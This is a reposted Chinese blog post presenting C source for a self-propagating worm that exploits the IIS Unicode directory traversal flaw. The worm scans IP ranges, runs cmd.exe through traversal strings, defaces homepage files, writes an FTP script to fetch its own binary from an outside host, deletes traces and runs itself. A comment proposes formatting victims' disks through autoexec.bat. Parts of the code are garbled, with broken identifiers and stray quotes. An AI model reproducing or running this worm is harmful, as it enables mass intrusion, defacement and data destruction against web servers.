掃描UNICODE漏洞傳播、攻擊的蠕蟲原始碼 (轉)[@more@]

在5.1期間的中美戰中，聯盟的網站中，+IIS+UNICODE主機佔90%。（美國的poizenBOx同樣是利用這個UNICODE漏洞攻擊我國的主機）

詳細請見

下面是我和zhaowuqing寫的一個利用該漏洞的。跟LION蠕蟲有些相象，都需要把自己寄存到某個主機上、、、、、、

執行：直接執行（無引數）將掃描本機IP開始的100個主機，並修改首頁、傳播

帶引數執行：202.97.233.0 202.97.233.254 這將掃描該IP段的主機並實施攻擊。

下面貼

forget to link with wsock32.lib :-o
#include
#include

義常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
MaxThread=100;//最大開100個執行緒掃描
面定義漏洞陣列
char *hole[]={"%c0%2f..%c0%2f..%c0%2f",
"%c0%af..%c0%af..%c0%af",
"%c1%1c..%c1%1c..%c1%1c",
"%c1%9c..%c1%9c..%c1%9c",
"%c0%2f..%c0%2f..%c0%2f",
"%c0%af",
"%c1%9c",
"%c1%pc",
"%c0%9v",
"%c0%qf",
"%c1%8s",
"%c1%1c",
"%c1%9c",
"%c1%af",
"%e0%80%af",
"%f0%80%80%af",
"%f8%80%80%80%af",
"%fc%80%80%80%80%af",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af","%c1%1c../..%c1%1c../..%c1%1c",
"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af",
"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af",
"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c"};

面7個漏洞出現的目錄，可以自己定義更多，但務必修改後改下面的for迴圈數字
char *ExeDirs[7]={"scripts","msadc","cgi-bin","_vti_bin","_vti_bin/msadc","scripts/msadc","IISADMPWD"};

明
long GetLocalIP(void);//獲得本機IP
D WIN FindExeDir(LPVOID lp);//找到可目錄
char *GetData(int SockFD);//獲取SEND返回的資料
char * find(const char*psz,const char * pszKey);//在返回資料中查詢指定字串

char *localpath;//system32的路徑
char *exedir;//指令碼路徑
char* Path;//首頁所存放的路徑

序入口

int main(int argc, char **argv)
{
HANDLE hThread=NULL;
DWORD dwThreadID;
long Previouunt;
int i;
int Star;
int StopNet;
int StartHost;//IP段開始
int StopHost;//IP段結束

WSADATA wsaData;
struct in_addr host;

Wtartup(0x202, &wsaData );
if(argc<2)//無引數執行的時候掃描本機IP開始的100個主機
{
StartNet=GetLocalIP();
StopNet=GetLocalIP()+100;
}
else//引數iis 202.97.56.3 202.97.56.254這種方式，取引數作為IP段
{
StartNet=inet_addr(argv[1]);
StopNet=inet_addr(argv[2]);
}
StartHost=ntohl(StartNet);
StopHost=ntohl(StopNet);
WSACleanup();
do
{

host.S_un.S_addr =_addr(argv[1]);
WSAStartup(0x202, &wsaData );

hSemaphore=CreateSemaphore(NULL,MaxThread,MaxThread,NULL);
if(hSemaphore==NULL)
{

printf("nCreateSemaphore failed:%d",GetLastError());
;
}

for(i=StartHost;i<=StopHost;i++)
{
hThread=CreateThread(NULL,0,FindExeDir,(LPVOID)i,0,&dwThreadID);
if(hThread==NULL)

{
printf("nCreate thread failed:%d",GetLastError());
break;
}
printf(".");
Sleep(10);
CloseHandle(hThread);
WaitForSingle(hSemaphore,INFINITE);
}
while(1)
{
WaitForSingleObject(hSemaphore,INFINITE);
if(!ReleaseSemaphore(hSemaphore,1,&PreviousCount))
{
printf("nmain() ReleaseSemaphore failed:%d",GetLastError());
Sleep(5000);
break;
}
if(PreviousCount==(MaxThread-1))
{
printf("nAll done.");
break;
}
Sleep(500);
}

printf("發現可執行目錄. [%s]n", exedir);
printf("可執行目錄是 [%s]n",localpath);

CloseHandle(hSemaphore);

WSACleanup();

}
while(argc<2);//無引數執行，既在被黑主機上執行,死迴圈

return 0;
}

long GetLocalIP(void)
{
char szName[128];
int i;
PHOSTENT pHost;
gethostname(szName, 128);
printf("%sn",szName);
pHost = gethostbyname(szName);
if( NULL == pHost )// failed
return 0;
for(i=0;pHost->h_addr_list[i]!=NULL;i++)
printf("%sn",inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i])));
return inet_addr(inet_ntoa(*((struct in_addr *)pHost->h_addr_list[i-1])));
}

DWORD WINAPI FindExeDir(LPVOID lp)
{
int host=(int)lp;
u_short port=80;
int SockFD,i;
struct sockaddr_in DstSAin;
char waste[500],uniwaste[500];
char *buffer,*p;
char space[3];
char dletter[2];//路徑
char asc[3];
int rbytes=0,loc1=0,loc2=0;
char locdir[300];
int exenum=0;
:
memset(locdir,0,300);
memset(uniwaste,0,499);
memset(space,0,3);
strcpy(space,"%20");
memset(asc,0,3);
strcpy(asc,"%3E");
printf("查詢漏洞%d...n",host);

for(i=0;i<8;i++)
{
strcat(uniwaste,"..");
strcat(uniwaste,hole[num]); unicode碼和URL結合起來.
}

memset(waste,0,500);
our string that sees if we can execute cmd.exe
way we know if a directory is executable and if the exe dir is on the same harddrive as cmd.exe
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sdir HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("Trying directory [%s]n", waste);
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Directory of"); 到了cmd.exe的目錄！！！
if(p!=NULL)
{

loc1=p-buffer+1;
p=strstr(buffer,"

");
if(p!=NULL)
{
loc2=p-buffer+1;
loc2=loc2-27;
buffer[loc2-2]='';
strncpy(locdir,buffer+loc1+12,290);
executable directory.
exedir=malloc(strlen(ExeDirs[exenum])+1);
memset(exedir,0,strlen(ExeDirs[exenum])+1);
memcpy(exedir,ExeDirs[exenum],strlen(ExeDirs[exenum]));
executable directory path
localpath=malloc(strlen(locdir)+1);
memset(localpath,0,strlen(locdir)+1);
memcpy(localpath,locdir,strlen(locdir));
closesocket(SockFD);
詢首頁位置

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%sset HTTP/1.0nn",ExeDirs[exenum],uniwaste,space);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{

send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
WebPath=find(buffer,"PATH_TRANSLATED=");//上面透過cmd.exe?/c set命令顯示主機
中找到WEB目錄，用來修改首頁
closesocket(SockFD);
strncpy(dletter,localpath,1);
dletter[1]='';
printf("首頁路徑%sn",WebPath);
}

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀default.>+%sdefault.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁default.asp n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("Access is denied");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.asp>+%sindex.asp HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁index.asp n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("不能修改，屬性有問題");
}
closesocket(SockFD);
}

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀index.html>+%sindex.html HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁index.html n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p=NULL)
{
printf("不能修改，檔案屬性有問題");
}
closesocket(SockFD);
}

memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);// DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+啞啞呀啞啞呀啞啞呀啞啞呀和~~~default.htm>+%sdefault.htm HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("修改首頁default.htm n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("不能修改，檔案屬性有問題");
}
closesocket(SockFD);
}
接到FTP主機
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+open+home4u.china.com>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("連線到FTP主機 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
登陸
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+111222>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("登陸USER:111222n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}

碼輸入
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+mmipip>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("密碼：mmipn");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}
FILE
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+get+srv.exe>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("srv.exe n");//把自己下載到漏洞主機執行
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}

出ftp主機
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%secho+quit>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("退出FTP主機 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
printf("system32不允許寫操作");
}
closesocket(SockFD);
}

始FTP
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%tp+-s:up.txt>>+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("下載檔案 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Error");
if(p!=NULL)
{
printf("FTP結束");
}
closesocket(SockFD);
}
除del.txt避免在主機上留有FTP資訊
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%sdel+%s:winntsystem32up.txt HTTP/1.0nn",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("刪除FTP痕跡 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"access is");
if(p!=NULL)
{
printf("刪除失敗");
}
closesocket(SockFD);
}
行
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd".exe?/c%ssrv.exe HTTP/1.0nn",ExeDirs[exenum],uniwaste);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
printf("在主機上執行自己 n");
send(SockFD,waste,strlen(waste),0); one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"CGI Error");
if(p!=NULL)
{
printf("執行成功");//此時存在漏洞的主機開始掃描自己IP段附近的漏洞主機
}
closesocket(SockFD);
}

1;
}

}

if(num<23)//迴圈嘗試漏洞編碼
{ num++;
closesocket(SockFD);
goto crack;
}
else
{
if(exenum<6)//遍歷各個目錄
{
num=0;
exenum++;
ExeDirNum=exenum;
closesocket(SockFD);
goto crack;
}

closesocket(SockFD);
}

printf("掃描全部結束，在此應該進行破壞性操作...n");
選辦法，在目標主機上的autoexec.bat里加上格式化命令
後執行ExitSystem(1);使主機重新啟動
新啟動後格式化硬碟
}
return 0;
}

返回的資料中查詢指定資訊
char* find(const char*pszSource,const char* pszKey)
{
static char szBuffer[2049];
const char * p;
const char * q;
p = q = NULL;
p = strstr(pszSource,pszKey);
if ( p != NULL )
{
p += strlen(pszKey);
q = strstr(p,"rn");
if ( q == NULL )
q = p + strlen(p);
strncpy(szBuffer,p,q-p);
return szBuffer;
}
return NULL;
}

char *GetData(int SockFD)
{
data without a blocking recv so we dont hang if we crash the server
char *buffer;
char data[2001];
unsigned long on=1;
unsigned long off=0;
char waste[2001];
int p, i=1;
int t;

memset(data,0,2001);
p=ioctlsocket(SockFD,FIONBIO,&on);
memset(waste,0,2001);
for(t=1;t<10;t++){
i=recv(SockFD, waste, 2000, 0);
if(i>0)
break;
Sleep(500);
}
waste[i]='';
strncat(data,waste,2000);
buffer = ( char * )malloc( 2000 * sizeof( char ) );
strncpy( buffer, data, 2000 );
return buffer;
}

掃描UNICODE漏洞傳播、攻擊的蠕蟲原始碼 (轉)

相關文章